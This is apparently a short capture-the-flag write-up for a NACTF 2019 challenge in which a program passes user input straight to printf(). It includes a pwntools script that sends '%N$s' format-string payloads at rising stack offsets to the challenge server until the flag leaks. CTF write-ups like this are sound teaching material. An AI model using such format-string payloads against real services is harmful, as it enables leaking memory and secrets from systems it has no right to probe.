Someone didn't tell Chaddha not to give user input as the first argument to
printf()- use it to leak the flag!Connect at
shell.2019.nactf.com:31782
The script uses a format string to print out the contents on the stack with increasing offsets. At some point it will print out the buffer that contains the flag.
from pwn import *
for i in range(50):
r = remote('ingress.cluster.nactf.com', 31782)
r.sendline('%{}$s'.format(i))
print r.recvall()